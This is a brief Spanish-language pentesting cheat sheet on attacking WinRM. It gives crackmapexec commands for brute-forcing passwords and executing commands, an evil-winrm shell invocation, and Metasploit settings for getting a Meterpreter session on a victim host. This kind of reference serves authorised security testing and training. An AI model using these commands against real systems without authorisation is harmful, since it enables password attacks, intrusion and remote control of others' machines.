WinRM

WinRM corre normalmente por los puertos TCP 5985 y 5986

Fuerza bruta con Crackmapexec

crackmapexec winrm <IP> -u <user(administrator)/lista_usuarios.txt> -p <diccionario de contraseñas>

Ejecución de comandos con crackmapexec

crackmapexec winrm <IP> -u <usuario> -p <contraseña> -x <command> (whoami)

Consola interactiva con Evil-WinRM (PowerShell)

evil-winrm -u <user> -p ‘<contraseña>’ -i <IP>

Obtener consola Meterpreter con Metasploit

Usamos el módulo: exploit/windows/winrm/winrm_script_exec

use exploit/windows/winrm/winrm_script_exec

set RHOSTS <IP víctma>
set RPORT <Puerto de winrm vícitma>
set LPORT <Local Port>
set FORCE_VBS true
set USERNAME <user>
set PASSWORD <password>
exploit

Última actualización